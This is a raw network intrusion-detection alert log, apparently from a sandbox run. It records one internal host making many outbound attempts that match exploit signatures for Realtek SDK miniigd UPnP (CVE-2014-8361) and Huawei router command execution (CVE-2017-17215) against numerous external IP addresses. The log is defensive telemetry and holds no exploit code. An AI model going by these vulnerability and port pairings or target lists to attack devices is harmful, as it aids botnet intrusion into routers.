                                                07/20/24-23:05:59.045966TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23414652869192.168.2.14145.135.164.39
                                                07/20/24-23:06:09.485916TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25525652869192.168.2.1413.171.239.70
                                                07/20/24-23:05:55.889998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3948637215192.168.2.14197.218.241.1
                                                07/20/24-23:06:01.320421TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5239252869192.168.2.1479.219.80.235
                                                07/20/24-23:06:32.857938TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23305052869192.168.2.14219.6.222.246
                                                07/20/24-23:06:04.969328TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25908052869192.168.2.1441.93.92.223
                                                07/20/24-23:06:09.639160TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4002452869192.168.2.14119.77.231.32
                                                07/20/24-23:06:51.729184TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4295852869192.168.2.14135.110.187.16
                                                07/20/24-23:05:59.139794TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5815052869192.168.2.1431.110.108.63
                                                07/20/24-23:06:18.910197TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613424252869192.168.2.14182.231.108.120
                                                07/20/24-23:05:40.451363TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4514052869192.168.2.1427.50.141.50
                                                07/20/24-23:05:35.559388TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613759452869192.168.2.14137.29.148.187
                                                07/20/24-23:05:40.413313TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5713652869192.168.2.14192.120.138.130
                                                07/20/24-23:05:39.680161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5676637215192.168.2.14157.97.32.183
                                                07/20/24-23:05:33.857158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3844637215192.168.2.1441.122.250.164
                                                07/20/24-23:06:03.208973TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4168252869192.168.2.1450.48.189.161
                                                07/20/24-23:05:59.080968TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615322852869192.168.2.1413.186.96.233
                                                07/20/24-23:05:40.465472TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25516452869192.168.2.14118.253.173.37
                                                07/20/24-23:06:19.603798TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4342652869192.168.2.1435.37.174.94
                                                07/20/24-23:05:38.803802TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5873452869192.168.2.14218.43.11.190
                                                07/20/24-23:06:13.745204TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3371052869192.168.2.14150.121.79.74
                                                07/20/24-23:05:39.897315TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614524252869192.168.2.14157.151.72.129
                                                07/20/24-23:05:35.201041TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6062852869192.168.2.1452.136.210.121
                                                07/20/24-23:05:52.565127TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4441452869192.168.2.14139.27.203.218
                                                07/20/24-23:06:03.378832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3946437215192.168.2.14197.49.120.233
                                                07/20/24-23:05:45.392755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3689037215192.168.2.14157.14.89.203
                                                07/20/24-23:05:42.145992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4963837215192.168.2.14197.142.224.212
                                                07/20/24-23:05:47.108564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5644437215192.168.2.1441.191.4.243
                                                07/20/24-23:05:59.996045TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4314452869192.168.2.1420.84.196.35
                                                07/20/24-23:05:35.544209TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614281052869192.168.2.1480.130.32.22
                                                07/20/24-23:05:57.216313TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5798852869192.168.2.14181.109.235.229
                                                07/20/24-23:05:59.692242TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5649052869192.168.2.1480.43.192.97
                                                07/20/24-23:05:59.442577TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25696252869192.168.2.1479.208.10.184
                                                07/20/24-23:05:56.994181TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615859052869192.168.2.14183.63.189.195
                                                07/20/24-23:05:50.611308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4689237215192.168.2.1441.216.22.102
                                                07/20/24-23:05:44.314691TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614818052869192.168.2.14185.227.212.222
                                                07/20/24-23:06:06.184196TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24386652869192.168.2.14203.100.96.66
                                                07/20/24-23:05:34.660344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4333237215192.168.2.1441.7.174.17
                                                07/20/24-23:05:39.570909TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615107452869192.168.2.14178.30.251.228
                                                07/20/24-23:06:20.035971TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23290252869192.168.2.1434.68.31.177
                                                07/20/24-23:06:15.083231TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5995852869192.168.2.14132.53.183.184
                                                07/20/24-23:06:06.090759TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5636652869192.168.2.1438.146.250.130
                                                07/20/24-23:05:59.247850TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26062252869192.168.2.1442.106.20.3
                                                07/20/24-23:06:13.720163TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614366852869192.168.2.1457.46.152.49
                                                07/20/24-23:06:44.665919TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5913452869192.168.2.1495.117.101.32
                                                07/20/24-23:05:58.403603TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4797852869192.168.2.1478.101.209.190
                                                07/20/24-23:06:02.449958TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616097852869192.168.2.14101.251.173.173
                                                07/20/24-23:05:37.444466TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25298452869192.168.2.1490.248.254.246
                                                07/20/24-23:05:52.468494TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23433652869192.168.2.1486.103.97.76
                                                07/20/24-23:05:57.144593TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613867252869192.168.2.1498.96.42.253
                                                07/20/24-23:05:45.051748TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615304452869192.168.2.14163.111.67.44
                                                07/20/24-23:05:33.852857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6031237215192.168.2.14211.45.136.152
                                                07/20/24-23:05:38.953817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4063237215192.168.2.14157.224.76.86
                                                07/20/24-23:05:38.610532TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5582652869192.168.2.14168.22.240.103
                                                07/20/24-23:05:57.809291TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614033852869192.168.2.14136.239.147.161
                                                07/20/24-23:05:42.143657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5574437215192.168.2.14197.64.105.126
                                                07/20/24-23:05:48.807124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4325437215192.168.2.1441.63.30.246
                                                07/20/24-23:05:52.554950TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25931052869192.168.2.1434.93.140.173
                                                07/20/24-23:07:32.121311TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24468452869192.168.2.1481.47.157.203
                                                07/20/24-23:05:56.058256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4110837215192.168.2.14157.160.8.34
                                                07/20/24-23:05:35.234052TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5120252869192.168.2.14154.57.81.200
                                                07/20/24-23:05:35.390561TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614948052869192.168.2.14175.91.47.151
                                                07/20/24-23:05:37.442841TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23741252869192.168.2.14200.98.155.108
                                                07/20/24-23:05:40.342828TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5935452869192.168.2.1413.60.62.114
                                                07/20/24-23:05:59.204161TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25465252869192.168.2.14116.220.0.95
                                                07/20/24-23:06:00.210554TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23522252869192.168.2.14152.209.55.30
                                                07/20/24-23:05:50.537576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5069037215192.168.2.14197.10.203.24
                                                07/20/24-23:05:42.245742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3859237215192.168.2.1441.170.167.228
                                                07/20/24-23:06:01.235921TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4849452869192.168.2.149.150.51.97
                                                07/20/24-23:05:39.039093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5792237215192.168.2.14120.43.125.170
                                                07/20/24-23:05:57.032993TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24638252869192.168.2.1436.156.255.210
                                                07/20/24-23:05:59.565815TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3564652869192.168.2.1495.105.177.126
                                                07/20/24-23:06:09.635095TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616060452869192.168.2.144.21.2.155
                                                07/20/24-23:07:36.644546TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613448852869192.168.2.1436.138.112.150
                                                07/20/24-23:06:17.529212TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615510452869192.168.2.14143.84.11.112
                                                07/20/24-23:05:45.460569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3557637215192.168.2.14157.178.61.166
                                                07/20/24-23:06:46.637280TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614758252869192.168.2.14166.26.188.195
                                                07/20/24-23:05:59.118555TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5844452869192.168.2.14219.4.1.236
                                                07/20/24-23:05:56.818967TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614504052869192.168.2.1499.108.70.8
                                                07/20/24-23:05:59.302912TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3640452869192.168.2.14195.241.186.3
                                                07/20/24-23:05:37.612113TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4416652869192.168.2.1446.103.116.159
                                                07/20/24-23:05:34.653253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3950637215192.168.2.14157.51.200.31
                                                07/20/24-23:05:39.494301TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5444052869192.168.2.1492.247.141.149
                                                07/20/24-23:05:57.422953TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24396652869192.168.2.14130.194.61.21
                                                07/20/24-23:05:39.875016TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615859452869192.168.2.1474.254.17.92
                                                07/20/24-23:06:01.963469TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615847052869192.168.2.14201.146.209.197
                                                07/20/24-23:05:35.367234TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4850452869192.168.2.14125.97.107.120
                                                07/20/24-23:05:47.129772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3462237215192.168.2.14212.218.115.20
                                                07/20/24-23:05:35.912455TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613494252869192.168.2.1438.130.134.142
                                                07/20/24-23:05:59.082446TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3904252869192.168.2.14141.93.218.139
                                                07/20/24-23:05:40.455250TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24605452869192.168.2.1491.111.129.197
                                                07/20/24-23:05:48.767395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5192237215192.168.2.14197.41.47.111
                                                07/20/24-23:06:04.407221TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3594252869192.168.2.14142.127.232.36
                                                07/20/24-23:05:42.180899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5561437215192.168.2.1441.102.98.6
                                                07/20/24-23:05:39.773172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5274237215192.168.2.14157.103.7.24
                                                07/20/24-23:05:40.348098TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4053252869192.168.2.14107.127.41.70
                                                07/20/24-23:06:13.638173TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25349252869192.168.2.14140.187.97.113
                                                07/20/24-23:05:34.625646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5127237215192.168.2.14157.146.42.35
                                                07/20/24-23:05:42.134564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5157037215192.168.2.1441.161.227.92
                                                07/20/24-23:05:57.342606TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3612252869192.168.2.14141.5.120.100
                                                07/20/24-23:05:42.257816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3947237215192.168.2.1441.208.152.49
                                                07/20/24-23:06:04.510666TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4498052869192.168.2.14200.224.84.86
                                                07/20/24-23:05:57.244491TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25078652869192.168.2.14160.184.86.98
                                                07/20/24-23:06:21.074396TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615527852869192.168.2.14111.77.250.222
                                                07/20/24-23:05:56.310476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3645837215192.168.2.1478.27.140.117
                                                07/20/24-23:05:36.431738TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4780252869192.168.2.1468.40.200.159
                                                07/20/24-23:05:40.433285TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3702252869192.168.2.1450.3.84.134
                                                07/20/24-23:06:50.419958TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615080852869192.168.2.1418.124.2.70
                                                07/20/24-23:05:56.038244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3956437215192.168.2.14157.34.251.250
                                                07/20/24-23:05:34.653253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3851637215192.168.2.1464.130.174.77
                                                07/20/24-23:05:52.539655TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25503052869192.168.2.1437.61.131.138
                                                07/20/24-23:06:07.860442TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3547652869192.168.2.1499.157.115.85
                                                07/20/24-23:06:10.529848TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615997852869192.168.2.14144.88.71.215
                                                07/20/24-23:06:03.123973TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3926852869192.168.2.14197.202.109.233
                                                07/20/24-23:05:58.789977TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24326052869192.168.2.1441.15.209.124
                                                07/20/24-23:05:59.132843TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23848452869192.168.2.14190.103.96.175
                                                07/20/24-23:06:07.090929TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3916652869192.168.2.1427.75.248.44
                                                07/20/24-23:05:37.444465TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24648852869192.168.2.1459.10.142.189
                                                07/20/24-23:05:35.230515TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614158652869192.168.2.14103.132.88.33
                                                07/20/24-23:05:58.758911TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4853052869192.168.2.1434.148.232.132
                                                07/20/24-23:05:57.832966TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613489852869192.168.2.14119.200.79.245
                                                07/20/24-23:06:08.048662TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615754252869192.168.2.14222.190.96.116
                                                07/20/24-23:05:38.153509TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4527052869192.168.2.14114.248.97.56
                                                07/20/24-23:05:33.855567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4596037215192.168.2.1441.133.29.67
                                                07/20/24-23:05:50.533759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5579837215192.168.2.1454.61.28.183
                                                07/20/24-23:05:40.347403TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5336052869192.168.2.1486.28.56.254
                                                07/20/24-23:05:52.468494TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3615252869192.168.2.14184.129.35.32
                                                07/20/24-23:05:59.058741TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3543052869192.168.2.1461.154.240.237
                                                07/20/24-23:05:52.513067TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3458652869192.168.2.14207.90.148.106
                                                07/20/24-23:05:58.384426TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5254852869192.168.2.1484.81.98.79
                                                07/20/24-23:06:07.518543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4801237215192.168.2.14183.58.128.182
                                                07/20/24-23:05:36.343632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4666837215192.168.2.14157.134.217.137
                                                07/20/24-23:05:37.441224TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5624252869192.168.2.14162.190.144.241
                                                07/20/24-23:05:57.841404TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3863852869192.168.2.14211.66.122.221
                                                07/20/24-23:05:33.830570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5938637215192.168.2.14157.32.82.175
                                                07/20/24-23:05:38.950380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031637215192.168.2.14197.161.202.18
                                                07/20/24-23:06:01.290865TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5065052869192.168.2.14188.84.165.22
                                                07/20/24-23:05:56.058256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4469637215192.168.2.1441.206.223.190
                                                07/20/24-23:07:15.011261TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615786452869192.168.2.14155.28.129.15
                                                07/20/24-23:05:37.452253TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25828252869192.168.2.14193.85.31.138
                                                07/20/24-23:05:37.601961TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3833852869192.168.2.14208.117.82.120
                                                07/20/24-23:05:42.131789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3647637215192.168.2.1441.147.131.113
                                                07/20/24-23:06:01.215644TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23292652869192.168.2.14150.247.197.160
                                                07/20/24-23:05:59.948391TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5936252869192.168.2.14132.226.208.26
                                                07/20/24-23:05:52.504672TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24272052869192.168.2.14134.147.18.133
                                                07/20/24-23:06:09.667246TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3516852869192.168.2.14109.172.98.3
                                                07/20/24-23:05:46.088778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358437215192.168.2.14197.95.78.116
                                                07/20/24-23:06:03.081824TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3685252869192.168.2.14115.224.138.67
                                                07/20/24-23:05:35.922674TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4629852869192.168.2.1435.159.139.53
                                                07/20/24-23:05:38.399887TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4930252869192.168.2.1491.121.169.191
                                                07/20/24-23:06:13.391443TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613431452869192.168.2.14150.164.92.90
                                                07/20/24-23:06:24.853073TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5640652869192.168.2.14141.15.111.86
                                                07/20/24-23:05:59.333647TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613809052869192.168.2.1418.34.122.251
                                                07/20/24-23:06:08.940741TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24613252869192.168.2.14220.38.3.62
                                                07/20/24-23:05:34.660344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5952437215192.168.2.14157.252.199.36
                                                07/20/24-23:05:38.094598TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615678452869192.168.2.1447.26.143.30
                                                07/20/24-23:05:59.358816TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615778852869192.168.2.14192.220.114.246
                                                07/20/24-23:06:01.801044TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614458852869192.168.2.14162.24.224.160
                                                07/20/24-23:05:58.855356TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5406452869192.168.2.1450.125.157.33
                                                07/20/24-23:05:58.394422TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5676452869192.168.2.1413.58.163.5
                                                07/20/24-23:06:32.610183TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4641052869192.168.2.1424.123.84.203
                                                07/20/24-23:05:59.128245TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5380852869192.168.2.14133.109.89.140
                                                07/20/24-23:06:07.806552TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24219252869192.168.2.1493.193.45.65
                                                07/20/24-23:05:47.809338TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613665852869192.168.2.14129.121.134.219
                                                07/20/24-23:06:07.972042TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3649452869192.168.2.14101.62.253.33
                                                07/20/24-23:05:34.664378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4930237215192.168.2.14197.1.71.210
                                                07/20/24-23:05:47.481216TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614356452869192.168.2.14123.146.160.118
                                                07/20/24-23:05:55.889998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3661037215192.168.2.14157.169.128.28
                                                07/20/24-23:05:57.422953TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24650252869192.168.2.1492.226.53.187
                                                07/20/24-23:05:57.513503TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4237652869192.168.2.14130.184.173.39
                                                07/20/24-23:05:47.782204TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613290652869192.168.2.1445.216.246.4
                                                07/20/24-23:05:52.557906TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5537852869192.168.2.145.107.169.199
                                                07/20/24-23:05:45.112360TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3851052869192.168.2.1432.113.241.254
                                                07/20/24-23:06:04.290200TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614840052869192.168.2.14156.92.82.212
                                                07/20/24-23:05:37.611139TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23819052869192.168.2.14211.88.161.89
                                                07/20/24-23:05:59.915135TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6079652869192.168.2.1497.122.27.131
                                                07/20/24-23:05:48.801547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4840237215192.168.2.1490.143.159.0
